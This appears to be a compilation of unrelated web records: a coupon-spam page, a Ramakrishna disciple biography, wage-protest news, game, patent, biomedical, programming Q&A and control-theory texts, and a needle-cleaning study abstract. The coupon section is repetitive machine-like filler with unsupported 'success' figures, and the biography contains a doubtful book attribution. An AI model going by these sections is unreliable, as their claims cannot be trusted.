Boxed Gifts Discount Promo Codes May 2018
Browse latest Boxed Gifts promo codes May 2018 to save your money here. There are 54 promo codes and coupons available at boxed-gifts.com. With our Boxed Gifts promo codes, customer can get discount in average of $14 for entire orders.
Boxed Gifts Save Up To $18 Discount Billing.
An Extra $18 Discount Billing. 128 people used, 64% success.
Show Promo Code
Boxed Gifts An Extra $18 Off, Used For All Billings $60.
Get An Extra $18 Discount For All Payments $60.Receive $18 Off, Applied To Every Invoices $60. 28 people used, 94% success.
Boxed Gifts Additional 20% Off.
Boxed Gifts Get Up To $18 Discount For All Payment Higher Than $60 Or More $2.5 Cash Credit Or More 2 Free Samples Or More Free 2 Days Delivery.
Save Up To $18 Off, Used For All Billing Plus $60 Or More $2.5 Cash Credit Or More 2 Free Samples Or More Free 2 Days Shipment.Get An Extra $18 Discount For All Payment Higher Than $60 Or More $2.5 Cash Credit Or More 2 Free Samples Or More Free 2 Days Shipment.Expire: 12/25/2018 120 people used, 88% success.
Show Promo Code
Boxed Gifts Save An Additional $18 Discount $60 Buying.
Get The Advantage Of $18 Discount $60 Billing. 30 people used, 57% success.
Show Promo Code
Boxed Gifts Receive $18 Discount Opening Buying.
Get The Advantage Of $18 Discount Early Purchase. 16 people used, 62% success.
Show Promo Code
Boxed Gifts Get $18 Discount First Payment From $60 Or More $2 Free Sample With Shipment Free.
Get The Advantage Of $18 Discount First Payment From $60 Or More $2 Free Sample Include No Fee Of Shipment.Additional $18 Discount Initial Invoice More Than $60 Or More $2 Free Sample Include No Fee Of Shipment.Expire: 12/18/2018 86 people used, 63% success.
Show Promo Code
Boxed Gifts Special Offer $18 Off, Used For All Billing.
Enjoy $18 Discount On Any Purchase. 14 people used, 74% success.
Show Promo Code
Boxed Gifts Take The Advantage Of $18 Discount Initial Invoice With Shipment Free.
Receive $18 Discount On Any Purchase From $60 Or More $2.5 Cash Credit Or More Free 2 Days Delivery Or More Free 2 Samples & Gift.Take Up To $18 Discount $60 Further & $2.5 Cash Credit Or More Free 2 Days Delivery Or More Free 2 Samples & Gift. 83 people used, 72% success. | 2023-10-13T01:27:15.642919 | https://example.com/article/6601 |
Ram Chandra Datta
Ram Chandra Datta (30 October 1851—17 January 1899) was a householder disciple of Ramakrishna and a writer. Datta was a relative of Indian monk and social reformer Swami Vivekananda. After completing his graduation, he took job of a Government employee and a chemist. He invented an antidote for blood dysentery from an extract of an indigenous medicinal plant and started promoting "modern science".
Datta became a disciple of Ramakrishna and encouraged Narendranath Datta (pre-monastic name of Swami Vivekananda) to go to Dakshineswar and meet Ramakrishna. He died on 17 January 1899 after suffering from heart disease and chronic asthma.
Early life
Datta was born on 30 October 1851 in Calcutta (The city is currently known as Kolkata). His father Nrisimha Prasad Datta was a devotee of Hindu god Krishna and his mother Tulasimani was known for her generosity and kindness. Datta's mother died when he was two and a half years old. Bhubaneshwari, who was a relative, mother of Vivekananda, tended to him and brought him up. In childhood Datta showed inclination to worship Krishna. His religious fervour was accentuated by his visits to a hermitage near his home when he interacted with monks of different orders. He was a vegetarian and had strict resolution of not to eat any non-vegetarian food; this resolve went to the extreme extent when he even walked out of a relative's house when he was 10 years old where they had cooked a non-vegetarian meal and were forcing him to eat it.
Soon after, Nrisimha Prasad remarried, but, Datta could not adjust with his stepmother and went to live in a relative's house.
Ram continued his education, in spite of several adversities, at the General Assembly’s Institution (now Scottish Church College). He then joined the Campbell Medical School in Calcutta and graduated.
He married Krishnapreyashi and during his marriage Vivekananda was the best man as they had the best of filial bonding.
Career
After his graduation Ram joined as an assistant to the Government Quinine Examiner. Once his financial position improved he purchased a house in the central Calcutta.
Ram took deep interest in chemistry while working with an English supervisor. He invented an antidote for blood dysentery from an extract of an indigenous medicinal plant which got the seal of approval from the government. Leading doctors started prescribing it and he became famous and as a result he was appointed a member of the Chemist Association of England. He was then elevated to the post of Government Chemical Examiner. He also started teaching to the military medical students at the Calcutta Medical College.
He also started teaching modern science which made him an atheist and he used to say "In those days we did not believe in God. We considered that everything happens, changes, or dissolves by the force of nature. We were rank materialists, and we held the view that eating, sleeping, and creature comforts were the summum bommum of life." He was also a good debater on subjects of God and religion and proved his atheistic views and this attitude continued for five years.
Then his young daughter died suddenly which plunged him to immense grief and self-reflection and attitude towards God.
He tried to look for solace in the Brahmo, Christian, and Hindu religious faiths but his "The great inquiry" of God did not seem to end. He then, on 13 November 1879, visited Ramakrishna for the first time at Dakshineshwar along with his friend Gopal Chandra Mittra and Manomohan Mittra, a cousin. This was the turning point in his life and he thereafter became a staunch devotee of Ramakrishna to the extent that he considered him as an Avatar of God and started propagating his message through lectures in later years. Ramakrishna visited Ram's house on 2 June 1886 which was a full moon day of the month of Vaisakh according to Bengali calendar, which became a festival day for Ram as he felt blessed on this occasion.
Spiritual life
Ram Chandra Datta was a householder disciple of Ramakrishna, the Master. His dedication and love for the Master was obsessively evident that he vehemently asserted that any place visited by the master was holy including the coach and the coachman which carried him around.
During 1882-86 there were two groups of disciples of Ramakrishna - The "Householder Group" (married group) to which Ram Chandra Datta belonged, and the "Renouncer Group" to which his cousin Narendra Nath Datta (who later became Swami Vivekananda) belonged and there was a cultural conflict between these two groups. This was brought out by Datta in his book Kathamrata when he stated : "He (Ramakrishna) did not talk about the renouncer disciples in the presence of the householder disciples, and he did not talk about the householder disciples in the presence of the renouncer disciples. But sometimes he would criticize both groups when both were present. They would chastise one another. In this way there was a feeling of hostility (virabhava) between these two groups."
Ramachandra's devotion to the master was so deep rooted that after Ramakrishna’s death on 16 August 1886 at the Cossipore garden house, after he was cremated on the bank of the Ganga his ashes were collected in an urn, taken from Casipore burning ghat, and kept initially on Ramakrishna’s bed. At that time, Vivekananda tried to pacify the grieving disciples by narrating Ramakrishna’s life events of mercy. Ramachandra wished to keep the urn of ashes in his Kankurgachi house but Vivekananda’s fellow boys played a trick on him, with the consent of Vivekananda, and transferred more than half the ashes to another urn and handed over the original urn to Ramachandra who then kept it in his house on the Krishnajanmashtami day, on 23 August, at Kankurgachi Yogodyana
His devotion to Ramakrishna was so intense that he built a temple consecrating the Master’s relics. He not only offered worship here but also vehemently propagated that Ramakrishna was an incarnation of god, an Avatar. With his gift of spiritual knowledge that he had acquired under the Master, he turned an "evangelist" and he delivered 18 public lectures between 1893 and 1897 at the Star, City, and Minerva Theaters in Calcutta extolling Sri Ramakrishna’s life and teachings. His first lecture titled "Is Ramakrishna Paramahamsa an Avatar?" was delivered on a Good Friday in 1893.
Following this he devoted himself to frugal living and made it a ritual to offer worship at the Kankurgachi Yogodyana every day commuting from his Simla home where he lived with his wife and children. In his official life, he exercised utmost discipline in his dealings with the public and suppliers that he refused to accept any kind of favour to overlook any lapses in standards of supplies and delivery.
Even in personal life he became so philosophical that when one of his daughters died of burns on 7 December 1886 his stoic and endured reaction was "The Lord gave me that daughter and He took her away. Why should I lament?"
Later life
Rama's ascetic life had a telling effect on his health. In 1898, dysentery compounded his problems of chronic diabetes and carbuncle. He was devoutly attended at his Simla home by his wife, friends, and disciples.
His health condition further deteriorated with heart disease and chronic asthma and he died on 17 January 1899. His relics are consecrated at Yogodyana adjoining the Sri Ramakrishna’s temple according to his last wish "When I die please bury a little of the ashes of my body at the entrance to Yogodyana. Whoever enters this place will walk over my head, and thus I shall get the touch of the Master’s devotees’ feet forever."
Relationship with Swami Vivekananda
Ram Chandra was the nephew of Bhuvaneswari Devi, mother of Narendranath Datta. He was twelve years older than Narendranath, but, Bhuvaneswari used to consider him as her another son. Mahendranath Datta, younger brother Narendranath, told, in their childhood they used to think that Ram Chandra was their elder brother.
In November 1881, Surendra Mitra's house was the venue of meetings where Ramakrishna was happy to be present and one of his householder disciples present on this occasion was Ram Chandra Datta along with his 16-year-old cousin Narendra Nath Datta who was still a student and he used to sing at such gatherings. Ramakrishna liked the youngster’s singing and he asked Ram Chandra and Surendra to bring the youngster to his Dakshineswar abode. He was so anxious to meet the young Narendra that he also directly asked Narendra to come and meet him. He was so enamored of Narendra and the effect was so profound which made him cry for six months till Narendra met him. But Narendra took time to meet him as he thought Ramakrishna was a "monomaniac".
In 1898, when Ram Chandra was seriously ill, Swami Vivekananda, after returning from the Western countries, visited Ram Chandra to inquire about his cousin's health. At that time Vivekananda even helped him to wear his slippers to go to the toilet as there was no body else in the room. Ram was so touched by this visit and kind gesture that his eyes watered and he emotionally stated: "Bille (Swami Vivekananda’s family nickname), I thought that after travelling to America and becoming famous you would have forgotten us. But now I see that you are my same little brother Bille."
Biographical works
In May 1885, Ram's compilation of some of Sri Ramakrishna’s important teachings was not published immediately as Ramakrishna advised him to delay its publishing as he said "Do not publish my biography now. If you do, my body will not last long." Ram complied and later wrote the first biography titled "Sri Sri Ramakrishna Paramhansadever Jivanvrittanta" which he subsequently expanded in to "Tattva-Prakashika" (The Teachings of Sri Ramakrishna). At this time he also started publishing a Bengali magazine.
In 1890, Ram Chandra wrote the biography of saint Ramakrishna Paramahamsa’s Life and Teachings in which he has used the expression guhya katha meaning "secret talk" attributed to the saint himself which pertained to secret tantric revelations.
Jivanavrrtanta was another book that he wrote. Vivekananda had even threatened to take Ram Chandra to court if he attributed to his name in this book, which was known by the epithet "bosh and rot".
References
Bibliography
Category:1851 births
Category:1899 deaths
Category:Lay disciples of Ramakrishna
Category:Scottish Church College, Calcutta alumni | 2024-05-11T01:27:15.642919 | https://example.com/article/4442 |
Image copyright Getty Images Image caption Fast food workers and others - including airport employees and carers - are asking for higher wages
US fast food worker protests expanded to 190 cities on Thursday as the movement to raise the minimum wage in the US to $15 (£9.57) an hour reached a two-year anniversary.
In cities from Boston to Chicago, fast food workers and union organisers marched outside of various McDonalds.
The movement has seen some success, with cities such as San Francisco and Seattle raising the minimum wage.
US President Barack Obama has said he supports their efforts.
Two-year anniversary
The so-called "Fight for 15" movement has organised eight protests and walk-outs in the past two years, but billed Thursday's efforts as their biggest yet.
Fast food workers, airport employees and home-health aids, amongst others, have argued that the current federal minimum wage of $7.25 is not enough to allow workers to live.
Image copyright AP Image caption Workers and union supporters in Michigan protested in the early morning outside a McDonalds
The campaign is backed by the Service Employees International Union, which has provided financial support and organisational help to the effort.
They have exerted pressure on McDonalds, Burger King and other fast food restaurants to raise wages, in addition to working with local politicians to get wage-raising measures on the ballot during election season.
McDonalds has said that the protestors do not necessarily represent the opinions of all of its employees, and that wage decisions are up to individual franchise owners.
"It's important to know approximately 90% of our US restaurants are independently owned and operated by franchisees who set wages according to job level and local and federal laws," it said in a statement.
'A real struggle'
In New York City, hundreds of workers gathered at a McDonalds in downtown Manhattan, chanting slogans and walking in step with a marching band.
Image caption Workers briefly entered a McDonalds in lower Manhattan before marching out
They briefly went into a franchise, before leading a march toward's New York's City Hall.
"I'm going to cry - we went from 200 workers in New York City to workers in countries around the world," said one organiser who addressed the crowd.
"We've accomplished a lot in the last two years."
Shantel Walker has been with the movement from the beginning and has attended six protests.
She has been working at a Papa John's pizzeria franchise on and off since 1999, yet she says she still only earns $8.50 per hour - not substantially more than when she first started.
"Right now it's a real struggle to survive," she says.
Image caption Shantel Walker has worked for Papa John's since 1999
"If I get paid on Saturday, by Monday I'm broke."
Smart choice
Labour analysts say that the movement has managed to gain momentum both because it capitalised on the increasing focus on income inequality in the wake of the 2010 Occupy movement, and because it made canny organisational choices from the start.
"The fast food fight did one thing that was smart instead of just demonizing McDonalds, they've really pushed for metropolitan wide increases in the minimum wage for everyone," says Nelson Lichtenstein, the director of the Center for the Study of Work, Labor and Democracy at the University of California - Santa Barbara.
Image caption Fast food workers began organising strikes and protests two years ago in New York City
That has meant that the movement has been able to gain many different types of workers.
Furthermore, instead of just exerting pressure on specific corporations like McDonalds and Burger King, for example, organisers have been able to focus attention on wages for everyone and thus get certain ballot measures passed.
And for workers like Ms Walker, those small successes - in cities like San Francisco and SeaTac, Washington - are reason enough to keep marching.
Corporations "get richer and we get poorer and that's the bottom line" she says. | 2024-06-27T01:27:15.642919 | https://example.com/article/6621 |
Britain, Germany, the United States, the Austro-Hungarian Empire, Italy and the Ottomans: these will be Battlefield 1's multiplayer belligerents at launch. If you have a passing interest in history, that list might seem a little short—almost as if a major player has been pegged for its own DLC.
With France confined for the campaign, there was an inkling it might be redeployed to DLC at a later date. Those suspicions have been confirmed by DICE's Julien Wera, speaking to IGN France:
"To really do justice to the French army in multiplayer and, once again, to show a side that we're not used to seeing, we have chosen to dedicate an entire premium expansion with special treatment after the launch of the game."
That's a rough Google translation, but the meaning is clear.
What I find strange is the decision to structure Battlefield 1's DLC (because there was always going to be DLC) by army rather than by region or campaign. For example, the Brits will be duking it out over the French town of Amiens at launch.
The Russian Empire is still MIA. | 2024-02-22T01:27:15.642919 | https://example.com/article/5971 |
Welcome
Thank you for your interest in the IUCN Primate Specialist Group’s Section for Human-Primate Interactions (PSG HPI). This working group will be composed of volunteers with expertise in human-primate relations in various contexts coming from a wide range of disciplines across natural and social sciences and the humanities. We seek members with substantial experience of human-primate interactions at the practical or academic level. Please contact us for more information. | 2024-01-02T01:27:15.642919 | https://example.com/article/9312 |
<!--
~ Copyright 2018 The Android Open Source Project
~
~ Licensed under the Apache License, Version 2.0 (the "License");
~ you may not use this file except in compliance with the License.
~ You may obtain a copy of the License at
~
~ http://www.apache.org/licenses/LICENSE-2.0
~
~ Unless required by applicable law or agreed to in writing, software
~ distributed under the License is distributed on an "AS IS" BASIS,
~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
~ See the License for the specific language governing permissions and
~ limitations under the License.
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:dist="http://schemas.android.com/apk/distribution"
package="safe.gradle.test.app.dynamic_feature">
<dist:module
dist:instant="false"
dist:onDemand="true"
dist:title="@string/title_dynamic_feature">
<dist:fusing dist:include="true" />
</dist:module>
</manifest>
| 2023-08-19T01:27:15.642919 | https://example.com/article/4031 |
About Me
Wednesday, October 29, 2008
Spaghetti
I thought I would make the kids some nice yummy spaghetti and meatballs, the kids will love this one at the Harvest night tonight in church. Oh did I tell you they just happen to be cupcakes.I used a chocolate cake mix, vanilla frosting that I mixed with a little cocoa powder and a few drops of yellow food coloring. The meatballs are Ferrero Rocher and the sauce is low sugar strawberry preserves. They are really good.
The adults loved them. My kids ate them in the house and really liked them, some of the other kids did not try them, they had so many donuts, pizza and candy. I really don't care for cake or frosting and I don't like dark chocolate. But I think it was the strawberry that really made them different and the chocolate cake was good, it just all worked really good together.
Facebook Badge
Facebook Badge
Sociable
Welcome
Hello and thanks for stopping by.
My name is April I have been married for over 28 years (June 6, 1981) We have six kids, Brandi (27), Kristine (26) Kimberly(23) (Eric, Noah), David(18), Jacob(13) and Daniel (10). We also have one Grandson Noah.
As you can tell I love to cook and I also love to take pictures so this blog has been a lot of fun. It started as a way for me to share recipes with my daughters and then I found all the other wonderful food blogs on line and it has been a blast. I hope you enjoy my recipes and stop by and look at my family pictures and try some of the recipes.
I am still learning a lot about blogging so bare with me and I hope you enjoy my blog as well as all the recipes I share with you. | 2023-12-14T01:27:15.642919 | https://example.com/article/7670 |
When patients are under anesthesia during surgery, the patient's eyes are generally taped shut by the use of ordinary tape. The taping of the eyes is performed for a variety of reasons. The most common reason is to protect them from abrasions or cornea drying out while under anesthesia. The patient does not tear while asleep so that the eye can dry out especially when under anesthesia. For the anesthesiologist, this requires tearing a strip of tape while wearing rubber gloves and gripping the tape to remove it after the operation. The use of ordinary tape provides a problem for the patient since the eyelashes can stick to the adhesive and cause problems.
U.S. Pat. Nos. 3,339,546 and 4,062,361, which are herein incorporated by reference, disclose hydrocolloids which can be used in the adhesives of the present invention.
U.S. Pat. No. 5,144,944 to Rice discloses a narrow skin closure dressing for eyelids comprising an adhesive layer on backing material, a multi-layered pad covering a portion of the face of the backing material and an outer layer of the backing material being free of adhesive. One or more side tabs are provided to assist in removal. The closure is primarily for use after surgical procedures.
The prior art closure dressings have the problems that they are difficult to handle with gloves. They are non-transparent and do not cover the eyes but only the upper eye lid so that the eyes can still be unprotected. | 2024-06-05T01:27:15.642919 | https://example.com/article/3068 |
Nuclear factor E2-related factor 2 (Nrf2) is a key transcription factor which induces the expression of various cellular antioxidant and detoxifying enzymes through the binding and transcriptional activation of antioxidant response elements (ARE) in the promoters of their genes. The Nrf2/ARE pathway is known to protect cells against various stress stimuli, primarily oxidative stress associated with increased production of reactive oxygen species (ROS). Nrf2 activity is tightly regulated by a cytoplasmic inhibitory protein Kelch-like ECH-associated protein-1 (Keap-1) which acts as an adaptor between Nrf2 and cullin-3 ubiquitin ligase and promotes rapid proteasomal degradation of Nrf2. Being a sensor of various exogenous and endogenous electrophilic compounds and ROS, Keap-1 undergoes conformational changes upon interaction with such agents and this causes Nrf2 release from the complex, thus allowing it to translocate to the nucleus and transactivate Nrf2-responsive genes \[see ([@bb0015], [@bb0035]) for recent reviews\].
In their study, Khan et al. (this issue) demonstrate that there is also an alternative mechanism whereby the Nrf2/ARE pathway can be activated in human leukemia cells performing oxidative phosphorylation (OXPHOS). The authors found that while OXPHOS results in increased generation of ROS, the induction of the "classical" Nrf2-responsive genes encoding heme oxygenase-1 (HO-1) and NAD(P)H:quinone oxidoreductase (NQO1) can also occur in a ROS-independent manner. This was associated with a decrease in Keap-1 mRNA levels, implying that lower protein levels of Keap-1 may facilitate stabilization of the *de novo* synthesized Nrf2 protein, thus increasing the functional activity of the Nrf2/ARE pathway. The data also show that the MAPK ERK5 is upregulated in this system. This suggests that ERK5 kinase is responsible for the downregulation of Keap-1, which may be mediated by the downstream target of ERK5, the transcription factor MEF2C. Khan et al. show that MEF2C binds to the promoter of the microRNA miR-23a--27a--24-2 cluster and that miR-23a destabilizes Keap-1 mRNA by interacting with its 3′-untranslated region (3\'UTR). Taken together, the results suggest that downregulation of Keap-1 in leukemic cells performing OXPHOS is mediated by the ERK5/MEF2/miR-23a signaling and that the resulting stabilization of Nrf2 leads to the activation of the Nrf2/ARE pathway, thus protecting the cells from the deleterious effects of ROS.
The findings by Khan et al. are in line with the previously reported ability of microRNAs to downregulate Keap-1 expression by targeting the 3′-UTR of its mRNA in several types of cancer cells ([@bb0005], [@bb0020], [@bb0040]). Interestingly, MEF2A and MEF2C were shown to positively regulate the expression of different microRNAs, including miR-23a, in human vascular smooth muscle cells undergoing oxidative stress-induced senescence ([@bb0050]) and in cardiac myocytes from mice with myotonic dystrophy ([@bb0025]), respectively. Therefore, the ERK5/MEF2/miR-23a/Keap-1 axis may represent a key regulatory pathway in a broad range of cell types under various pathological conditions.
The importance of microRNAs in regulation of hematopoiesis and its aberrations has been known for several years \[e.g., ([@bb0030])\]. For instance [@bb0010] found that the upregulation of miR-32 by 1,25-dihydroxyvitamin D~3~ in human myeloid leukemia cells leads to the targeting of the pro-apoptotic protein Bim, and inhibition of cytarabine-induced apoptosis, the latter frequently the result of excess generation of intracellular ROS. The report by Khan et al. demonstrates the important connection between microRNAs, Keap-1 and the alleviation of cellular oxidative stress. As such, it may indicate one basis for the emergence of resistance to cytotoxic chemotherapy of human neoplastic diseases. The novel, ERK5/microRNA-dependent, mode of Keap-1 downregulation suggested by this study adds to the reported mechanisms related to Keap-1 promoter hypermethylation and inactivating mutations that lead to hyperactivation of Nrf2/ARE, and thus to tumorigenesis and chemoresistance \[e.g., ([@bb0045])\]. In this scenario, anti-sense oligonucleotides which block miR-23a expression can be developed as therapeutic agents to fight consequences of the loss of function of Keap-1.
| 2024-01-05T01:27:15.642919 | https://example.com/article/9553 |
Q:
Python eggs - sometimes inflated, sometimes not
I'm running fedora 32 bit on one machine and have installed several eggs using easy_install.
I've installed the same eggs using easy_install on a 64-bit centos 5 machine. The site-packages directories are different - on my fedora machine, some of the eggs have been inflated so there are directories ending .egg-info as well as the main code directories. On Centos there are no .egg-info directories. Why is this?
Thanks
A:
A package can specify itself using the zip_safe flag inside its setup.py file if it should be unarchived or not. In addition most installers like 'easy_install' provide options to control the unpacking explicitly (e.g. easy_install --zip-ok ...)...so it may depend on how the packages are installed under Fedora oder CentOS.
| 2024-05-08T01:27:15.642919 | https://example.com/article/1446 |
Q:
grunt-contrib-build' is not in the npm registry
I'm getting below error when I try to install npm install grunt-contrib-build --save-dev on my Windows 7 system using command prompt.
C:\css-base>npm install grunt-contrib-build --save-dev
npm WARN package.json my-project@0.1.0 No README.md file found!
npm http GET https://registry.npmjs.org/grunt-contrib-build
npm http 404 https://registry.npmjs.org/grunt-contrib-build
npm ERR! 404 'grunt-contrib-build' is not in the npm registry.
npm ERR! 404 You should bug the author to publish it
npm ERR! 404
npm ERR! 404 Note that you can also install from a
npm ERR! 404 tarball, folder, or http url, or git url.
npm ERR! System Windows_NT 6.1.7601
npm ERR! command "C:\\Program Files\\nodejs\\\\node.exe" "C:\\Program Files\\nod
ejs\\node_modules\\npm\\bin\\npm-cli.js" "install" "grunt-contrib-build" "--save
-dev"
npm ERR! cwd C:\css-base
npm ERR! node -v v0.10.3
npm ERR! npm -v 1.2.17
npm ERR! code E404
npm ERR!
npm ERR! Additional logging details can be found in:
npm ERR! C:\css-base\npm-debug.log
npm ERR! not ok code 0
A:
If anyone finds this while trying to install this plugin:
grunt-contrib-build
is now called
grunt-usemin
However the tasks in the new plugin might not be supported, please check
https://github.com/yeoman/grunt-usemin/issues/3 for more information.
| 2024-04-10T01:27:15.642919 | https://example.com/article/5055 |
Camptothecin (CPT, Formula 1) is a natural product isolated from Nyssaceae plant Camptotheca acuminata, which was introduced into clinical practice in the early 1970s due to its excellent anticancer activity, later, due to diarrhea, hemorrhagic cystitis and other serious side effects, the clinical trials were terminated.
Since the 1990s, a number of camptothecin derivatives have come into the market or entered into clinical studies successively, including 10-hydroxycamptothecin, 7-ethyl-10-hydroxycamptothecin, 9-nitrocamptothecin, 9-aminocamptothecin, irinotecan (CPT-11, Formula 2), topotecan and belotecan, exatecan, lurtotecan, diflomotecan, gimatecan, karenitecin, and so on. Among them, irinotecan has a very broad antitumor spectrum, and Phase I, II clinical study results show that the drug has a positive effect on chemotherapy-resistant tumors such as metastatic colorectal cancer, non-small cell lung cancer, ovarian cancer and cervical cancer, and also has a certain effect on gastric cancer, malignant lymphoma non-Hodgkin's lymphoma, breast cancer, small cell lung cancer, skin cancer, pancreatic cancer. It is now mainly used as an effective drug for the treatment of advanced colorectal cancer, and can still be effective for 5-FU resistant cases.
However, camptothecin derivatives, including irinotecan, have a good anticancer activity, but still have some shortcomings, such as a poor solubility in water, great toxic side effects. The common adverse reactions are anorexia, nausea, vomit, diarrhea, leukopenia and neutropenia, anemia and thrombocytopenia, alopecia and acetylcholine syndrome. Especially diarrhea is the most common, nearly 90% of the subjects have diarrhea, of which nearly 30% have severe diarrhea.
Polyethylene glycol modification technology is a new technology developed rapidly in recent years, which is linking polyethylene glycol after activation to a drug molecule or surface to form a prodrug, and when the polyethylene glycol-drug complex enters the body, it can slowly release the drug molecule thus to produce curative effect. The polyethylene glycol-modified drug molecules have the following advantages: 1, increased water solubility of drugs; 2, reduced toxicity; 3, extended cycle half-life of drugs, reduced medication times, improved patient compliance, improved quality of life, reduced treatment cost; 4, reduced enzyme degradation effect, improved bioavailability.
Polyethylene glycol modification technology has been applied in camptothecin derivatives, WO2005028539 reports a series of compounds in which a multi-branched polyethylene glycol is linked to irinotecan, currently, in which one drug named etirinotecan pegol (Formula 3) is undergoing Phase III clinical trials for the treatment of metastatic breast cancer and colorectal cancer in a number of countries.
WO2007081596 reports a series of compounds in which a polyethylene glycol is linked to 7-ethyl-10-hydroxycamptothecin (an active metabolite of irinotecan in vivo), currently, in which one drug named firtecan pegol is undergoing Phase II clinical trials for the treatment of breast cancer and colorectal cancer in a number of countries.
CN103083680 discloses a polyethylene glycol-amino acid oligopeptide-irinotecan conjugate as shown in formula (4) having antitumor activity for the treatment of colorectal cancer, ovarian cancer and lung cancer, etc.
There have been no reports of pharmaceutical compositions of polyethylene glycol-modified camptothecin derivatives for injection in the prior art.
In the prior art, the pharmaceutical composition of the camptothecin derivative is mostly a lyophilized preparation for injection, and CN103655491 reports a pharmaceutical composition of an irinotecan hydrochloride and a preparation method thereof, wherein the irinotecan hydrochloride is prepared into a lyophilized preparation, however, in the preparation process not only irinotecan hydrochloride and water for injection are used, lactose, ethanol and other additives are also used, which may not only increase the cost of product, more importantly, introduce substances that may affect the efficacy and produce side effects, resulting in uncertainty factors for the drug safety.
In addition, in the prior art, high molecular weight polyethylene glycol amino acid oligopeptides are linked to camptothecin derivative through ester bonds, the ester bonds have a poor stability, especially in a humid environment is easier to be hydrolyzed slowly and thus release the camptothecin derivative, which thereby affects the effect of polyethylene glycol modified drugs, and in the preparation, storage and use of injections, particularly lyophilized preparations for injection, contact with the humid environment is unavoidable, resulting in a slow degradation of the pharmaceutical composition of the polyethylene glycol-modified camptothecin derivative, which affects the drug stability. | 2024-06-17T01:27:15.642919 | https://example.com/article/1483 |
---
abstract: 'A constructive tool of nonlinear control systems design, the method of Control Lyapunov Functions (CLF) has found numerous applications in stabilization problems for continuous-time, discrete-time and hybrid systems. In this paper, we address the fundamental question: given a CLF, corresponding to the continuous-time controller with some predefined (e.g. exponential) convergence rate, can the same convergence rate be provided by an event-triggered controller? Under certain assumptions, we give an affirmative answer to this question and show that the corresponding event-based controllers provide positive dwell-times between the consecutive events. Furthermore, we prove the existence of self-triggered and periodic event-triggered controllers, providing stabilization with a known convergence rate.'
author:
- 'Anton V. Proskurnikov, and Manuel Mazo Jr., [^1][^2] [^3]'
bibliography:
- 'event.bib'
- 'nonlinear.bib'
title: |
Lyapunov Event-triggered Stabilization\
with a Known Convergence Rate
---
Control Lyapunov Function, Event-triggered Control, Stabilization, Nonlinear Systems
tro.tex 2prelim.tex 3main.tex 5ext.tex
6proof.tex
[Anton Proskurnikov]{}(M’13, SM’18) was born in St. Petersburg, Russia, in 1982. He received the M.Sc. (“Specialist”) and Ph.D. (“Candidate of Sciences”) degrees in applied mathematics from St. Petersburg State University in 2003 and 2005, respectively.
Anton Proskurnikov is currently a Researcher at Delft Center for Systems and Control, Delft University of Technology (TU Delft), The Netherlands. Before joining TU Delft, he stayed with St. Petersburg State University (2003-2010) as an Assistant Professor and the University of Groningen (2014-2016) as a postdoctoral researcher. He also occupies part-time research positions at Institute for Problems of Mechanical Engineering of the Russian Academy of Sciences and ITMO University. His research interests include dynamics of complex networks, robust and nonlinear control, optimal control and control applications to social and biological sciences. He is a member of Editorial Board of the Journal of Mathematical Sociology.
[Manuel Mazo Jr.]{} (S’99, M’11, SM’18) is an associate professor at the Delft Center for Systems and Control, Delft University of Technology (The Netherlands). He received the M.Sc. and Ph.D.degrees in Electrical Engineering from the University of California, Los Angeles, in 2007 and 2010 respectively. He also holds a Telecommunications Engineering “Ingeniero” degree from the Polytechnic University of Madrid (Spain), and a “Civilingenjör” degree in Electrical Engineering from the Royal Institute of Technology (Sweden), both awarded in 2003. Between 2010 and 2012 he held a joint post-doctoral position at the University of Groningen and the (now defunct) innovation centre INCAS3, The Netherlands. His main research interest is the formal study of problems emerging in modern control system implementations, in particular, the study of networked control systems and the application of formal verification and synthesis techniques to control. He has been the recipient of a University of Newcastle Research Fellowship (2005), the Spanish Ministry of Education/UCLA Fellowship (2005-2009), the Henry Samueli Scholarship from the UCLA School of Engineering and Applied Sciences (2007/2008) and ERC Starting Grant (2017).
[^1]: The authors are with Delft Center for Systems and Control, Delft University of Technology, The Netherlands. [E-mail: anton.p.1982@ieee.org; m.mazo@tudelft.nl]{}
[^2]: The work is supported by NWO Domain TTW, Netherlands, under the project TTW\#13712 “From Individual Automated Vehicles to Cooperative Traffic Management – predicting the benefits of automated driving through on-road human behavior assessment and traffic flow models” (IAVTRM). It is also partially funded by the project SENTIENT funded by the European Research Council (ERC) under the EU’s Horizon 2020 research and innovation programme (ERC-StG 2017, \#755953).
[^3]: A special case of Theorem \[thm.dwell\] (dealing with exponentially stabilizing CLF) was presented [@ProMazo_HSCC] on the $21^{\rm st}$ ACM Conference on Hybrid Systems Computation and Control (HSCC’2018), Porto, Portugal, April 11-13, 2018.
| 2023-08-06T01:27:15.642919 | https://example.com/article/8054 |
Qualitative accounts of needle and syringe cleaning techniques among people who inject drugs in Sydney, Australia.
Cleaning needles/syringes is an important second-line harm reduction strategy, yet there is limited information on practices employed by people who inject drugs in Australia. This study attempts to identify and assess cleaning practices in terms of the techniques involved and the social contexts in which cleaning takes place. As part of an exploratory qualitative study in south-west Sydney, in-depth interviews and simulated cleaning exercises were conducted with 12 people who inject drugs. Interviews were digitally recorded and transcribed verbatim. Open coding was used to inductively classify data into themes, and data were examined for patterns and variations in the relationships within and between themes. Data indicate that cleaning and reuse of needles/syringes was common in this small sample. The most frequently utilised reagent was cool water. While all participants reported cleaning and reusing only their own equipment, none of the techniques demonstrated would have been sufficient to deactivate human immunodeficiency virus or hepatitis C virus. Results suggest that even where cleaning of needles and syringes is widespread, people who inject drugs may not engage in efficacious cleaning. The combination of the complexity of current cleaning messages and a lack of accurate information about efficacious techniques are likely to contribute to poor cleaning practice. Australia could benefit from the development of a nationally consistent cleaning message; however, the evidence would suggest that this would need to be accompanied by strategies designed to simplify and disseminate this information in order to increase the uptake of efficacious cleaning methods by people who inject drugs. | 2024-06-28T01:27:15.642919 | https://example.com/article/4092 |
Public trust and confidence in legal authorities: What do majority and minority group members want from the law and legal institutions?
